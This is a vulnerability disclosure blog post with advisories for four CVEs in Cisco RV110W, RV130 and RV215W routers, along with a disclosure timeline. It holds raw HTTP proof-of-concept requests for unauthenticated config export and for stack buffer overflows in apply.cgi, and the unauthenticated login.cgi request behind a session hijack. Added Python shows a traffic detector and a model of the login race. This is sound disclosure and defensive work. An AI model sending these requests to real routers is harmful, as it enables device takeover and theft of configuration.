More than a year ago now, Pentest Partners published an article explaining CVE-2019-1663, a stack buffer overflow affecting multiple low-end devices from Cisco (RV110, RV130, RV215). I then went on to write exploit modules for each affected device and version, as detailed in my “Exploiting CVE-2019-1663” post.
During the analysis I found other issues that I reported to Cisco PSIRT. These issues are now fixed.
TL;DR: Cisco RV110W, RV130(W), and RV215W VPN routers are affected by authentication bypass, authenticated remote command execution, and information disclosure issues. By chaining them, an unauthenticated remote attacker can fully compromise your device. Patch now.
Coordinated Disclosure Timeline
- 4 Nov 2019 - Initial report to Cisco PSIRT
- 5 Nov 2019 - Cisco assigns a case handler and starts looking at the report
- 17 Jan 2020 - PSIRT provides a tentative fix release date (March 2020)
- At this point COVID-19 happens and makes everything slower, but the Cisco folks keep me informed along the way
- 5 Jun 2020 - CVE identifiers are assigned; the tentative fix release date is set to July 2020
- 15 Jul 2020 - Release of fixed firmwares and security advisories
Cisco Security Advisories
You can find Cisco advisories at the following locations:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-rce-m4FEEGWX (CVE-2020-3145/CVE-2020-3146)
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-auth-bypass-cGv9EruZ (CVE-2020-3144)
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-info-dis-FEWBWgsD (CVE-2020-3150)
Detailed advisories with proof-of-concepts follow. As always, if you have any questions, just get in touch on Twitter or by email.
CVE-2020-3150 - Cisco RV110W/RV130/RV130W/RV215W Routers Unauthenticated Configuration Export
Summary
A vulnerability in the web-based management interface of Cisco RV110W/RV130W/RV215W Wireless-N Multifunction VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information.
Impact
A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information.
Note that to be able to download the file, an administrator must have opened the page backup.asp on the device since the last reboot. Once that page is accessed, the httpd binary sets a flag that allows generation of the startup.cfg download (saved in /tmp/config.txt).
Affected Systems
- RV110W Wireless-N Multifunction VPN Router up to version 1.2.2.4 included
- RV130 Multifunction VPN Router up to version 1.0.3.51 included
- RV130W Wireless-N Multifunction VPN Router up to version 1.0.3.51 included
- RV215W Wireless-N Multifunction VPN Router up to version 1.3.1.4 included
Description
The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs.
Here we show that an early version of the RV215W is affected:
GET /startup.cfg HTTP/1.1
Host: 192.168.1.1
Connection: close

HTTP/1.1 200 Ok
Server: httpd
Date: Fri, 01 Jan 2010 00:01:46 GMT
Content-Disposition: attachment; filename=RV215W_startup.cfg
Content-Type: application/octet-stream
Connection: close

;RV215W Configuration File - Version: 1.1.0.5
;MAC address: 10:BD:18:AC:57:3A
;Serial Number: CCQ231407B9
;The checksum: 8A41D8E444067386
--snip--
Other files, such as mirror.cfg or backup.cfg, are also affected, depending on the setup.
CVE-2020-3145 - Cisco RV130/RV130W Routers Management Interface Remote Command Execution (IPSEC)
Summary
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device.
Impact
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.
Affected Systems
- RV130 Multifunction VPN Router up to version 1.0.3.51 included
- RV130W Wireless-N Multifunction VPN Router up to version 1.0.3.51 included
Description
The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
We identified multiple dangerous calls to strcpy in the function at 0x00071cac in the httpd binary (/usr/sbin/httpd in firmware rootfs).
The decompiled function looks like the pseudo-code below; the comments are my own additions:
It is possible to trigger one of the stack buffer overflows above with an authenticated request such as the one below:
POST /apply.cgi;session_id=b37f0e917e54a1af0e1d7a0027d9de5d HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/apply.cgi;session_id=79f76000d1a3c29cef38c6dd14f25c0e
Content-Type: application/x-www-form-urlencoded
Content-Length: 1812
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

submit_button=vpn_adv_refresh&change_action=&submit_type=&gui_action=Apply&ipsec_enc=aes
128&ipsec_int=sha1&backname=&stflg=add&selidx=0&ipsec_stflg=add&ipsec_selidx=0&ike_stflg
=&ike_selidx=&next_page=vpn_adv&ipsec_policy_name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&ipsec_policy_type=0&ipsec_en
dpoint_type=0&ipsec_endpoint_value=1.1.1.1&ipsec_local_type=0&ipsec_local_start=1.1.1.1&
ipsec_local_subnet=255.255.255.255&ipsec_remote_type=0&ipsec_remote_start=1.1.1.1&ipsec_
remote_subnet=255.255.255.255&start_auto=&ipsec_sa_lifetime=3600&auto_ipsec_enc=aes128&a
uto_ipsec_int=sha1&ipsec_ike_policy_name=1&end_auto=&webpage_end=
CVE-2020-3146 - Cisco RV130/RV130W Routers Management Interface Remote Command Execution (PPP)
Summary
A vulnerability in the web-based management interface of the Cisco RV130W Wireless-N Multifunction VPN Router could allow an authenticated, remote attacker to execute arbitrary code on an affected device.
Impact
A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.
Affected Systems
- RV130 Multifunction VPN Router up to version 1.0.3.51 included
- RV130W Wireless-N Multifunction VPN Router up to version 1.0.3.51 included
Description
The vulnerability is due to improper validation of user-supplied data in the web-based management interface.
An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device.
We identified a dangerous call to strcpy in the function at 0x0006e994 in the httpd binary (/usr/sbin/httpd in firmware rootfs).
The decompiled function looks like the pseudo-code below; the comments are my own additions:
It is possible to trigger the stack buffer overflow above with an authenticated request such as the one below:
POST /apply.cgi;session_id=b37f0e917e54a1af0e1d7a0027d9de5d HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/apply.cgi;session_id=79f76000d1a3c29cef38c6dd14f25c0e
Content-Type: application/x-www-form-urlencoded
Content-Length: 1812
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

submit_button=wan&change_action=&submit_type=&ppp_passwd=dGVzdA==&wizard_pppoe_pname=AAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&gui_action=Apply&pppoe_select
_profile=0&wait_time=20&chg_flg=0wantag_enable=0&lan_ipaddr=192.168.1.1&wan_proto=pppoe&
ppp_demand=&_pppoe_select_profile=0&mtu_enable=0&webpage_end=
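As an added example (not the author's code and not taken from the firmware), the following Python flags the request patterns of the configuration export (CVE-2020-3150) and of the two apply.cgi overflows (CVE-2020-3145/3146) in captured HTTP traffic, e.g. from a proxy or IDS placed in front of the router. The log format is constructed, and the 64-byte field limit is an assumption, since the advisory does not give the real stack buffer sizes.

```python
"""Flag CVE-2020-3150 / CVE-2020-3145 / CVE-2020-3146 request patterns
in captured HTTP traffic (added example, constructed log format)."""
from urllib.parse import parse_qs, urlsplit

# Files that CVE-2020-3150 lets an unauthenticated client fetch.
CONFIG_FILES = {"/startup.cfg", "/mirror.cfg", "/backup.cfg"}
# apply.cgi fields copied with strcpy; 64 is an assumed sane limit, the
# advisory does not give the real stack buffer sizes.
OVERFLOW_FIELDS = {"ipsec_policy_name": 64, "wizard_pppoe_pname": 64}


def check_request(method, target, body=""):
    """Return a list of findings for one HTTP request."""
    findings = []
    # Authenticated URLs on these routers carry ';session_id=<hex>' in the path.
    base, _, params = urlsplit(target).path.partition(";")
    if method == "GET" and base in CONFIG_FILES and "session_id=" not in params:
        findings.append(f"unauthenticated config export: {base} (CVE-2020-3150)")
    if method == "POST" and base == "/apply.cgi":
        form = parse_qs(body, keep_blank_values=True)
        for field, limit in OVERFLOW_FIELDS.items():
            for value in form.get(field, []):
                if len(value) > limit:
                    findings.append(f"oversized {field} ({len(value)} bytes) "
                                    f"in apply.cgi (CVE-2020-3145/3146)")
    return findings


def scan_log(lines):
    """Constructed format: '<src> <method> <target> [<body>]' per line."""
    report = []
    for line in lines:
        parts = line.split(" ", 3)
        src, method, target = parts[:3]
        body = parts[3] if len(parts) == 4 else ""
        report.extend((src, f) for f in check_request(method, target, body))
    return report


SID = ";session_id=b37f0e917e54a1af0e1d7a0027d9de5d"  # session id from the post's PoC
SAMPLE_LOG = [  # constructed traffic
    "10.0.0.7 GET /startup.cfg",
    "10.0.0.9 GET /backup.asp" + SID,
    "10.0.0.7 POST /apply.cgi" + SID + " submit_button=vpn_adv_refresh"
    "&ipsec_policy_name=" + "A" * 1200 + "&next_page=vpn_adv",
    "10.0.0.9 POST /apply.cgi" + SID + " submit_button=wan&wizard_pppoe_pname=office",
]

if __name__ == "__main__":
    for src, finding in scan_log(SAMPLE_LOG):
        print(src, finding)
```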
CVE-2020-3144 - Cisco RV110W/RV130/RV130W/RV215W Routers Authentication Bypass
Summary
A vulnerability in the web-based management interface of the Cisco RV110W/RV130W/RV215W Wireless-N Multifunction VPN Routers could allow an unauthenticated, remote attacker to gain unauthorized access to the web-based management interface.
Impact
An unauthenticated user can gain unauthorized access to the router’s web-based management interface.
Affected Systems
- RV110W Wireless-N Multifunction VPN Router up to version 1.2.2.4 included
- RV130 Multifunction VPN Router up to version 1.0.3.51 included
- RV130W Wireless-N Multifunction VPN Router up to version 1.0.3.51 included
- RV215W Wireless-N Multifunction VPN Router up to version 1.3.1.4 included
Description
When an administrator logs into the device's administrative interface while a session is already open, the UI displays a message asking whether the user wants to disconnect the existing session. When the admin clicks “OK”, the following request is sent:
POST /login.cgi HTTP/1.1
Host: 192.168.1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1812
Connection: close

submit_button=login&submit_type=continue&gui_action=gozilla_cgi
The server then proceeds and issues a valid session to the end user.
An attacker can take advantage of the fact that the confirmation request is neither authenticated nor bound to the legitimate administrator's source IP to hijack the administrator's session.
By sending confirmation requests in a loop, the attacker hijacks the session whenever one of them happens to be received between the administrator's authentication request and the administrator's own confirmation.
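To make the race concrete, here is an added Python model of the login/confirm handling (constructed; neither the firmware's code nor the author's proof of concept). One handler accepts submit_type=continue from any client; the other binds the confirmation to the client that started the login using a one-time nonce. That binding is one possible mitigation and is an assumption here, not Cisco's actual fix.

```python
"""Model of the login.cgi 'continue' step (constructed, not the firmware's code).
bind_confirmation=False reproduces the vulnerable behaviour; True is an assumed fix."""
import secrets

ADMIN_PASSWORD = "constructed-admin-password"   # constructed credential


class LoginHandler:
    def __init__(self, bind_confirmation):
        self.bind_confirmation = bind_confirmation
        self.active_session = None   # session id of the admin currently logged in
        self.pending = None          # (client, nonce) of a login awaiting confirmation

    def login(self, client, password):
        """First login grants a session; a second one, while a session is
        still open, asks the client to confirm it wants to take it over."""
        if password != ADMIN_PASSWORD:
            return {"error": "bad credentials"}
        if self.active_session is None:
            self.active_session = secrets.token_hex(16)
            return {"session_id": self.active_session}
        self.pending = (client, secrets.token_hex(16))
        return {"confirm_required": True, "nonce": self.pending[1]}

    def confirm(self, client, nonce=None):
        """submit_type=continue. Vulnerable: whoever sends it gets the new
        session. Hardened: client and nonce must match the pending login."""
        if self.pending is None:
            return {"error": "nothing to confirm"}
        if self.bind_confirmation and (client, nonce) != self.pending:
            return {"error": "confirmation not bound to this login"}
        self.pending = None
        self.active_session = secrets.token_hex(16)
        return {"session_id": self.active_session}


def race(bind_confirmation):
    """Admin logs in twice; a looping 'continue' from another host lands
    before the admin clicks OK. Returns True if the other host got the session."""
    router = LoginHandler(bind_confirmation)
    router.login("admin-host", ADMIN_PASSWORD)
    admin_reply = router.login("admin-host", ADMIN_PASSWORD)   # confirmation now pending
    stolen = router.confirm("other-host")                       # unbound confirm request
    admin = router.confirm("admin-host", admin_reply["nonce"])  # admin clicks OK
    return "session_id" in stolen and "session_id" not in admin


if __name__ == "__main__":
    print("vulnerable handler hijacked:", race(False))   # True
    print("hardened handler hijacked:", race(True))      # False
```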
The Python script below is a proof of concept demonstrating the issue. Run it in the background and try to authenticate twice on the device’s web administration interface to see how the session is successfully hijacked.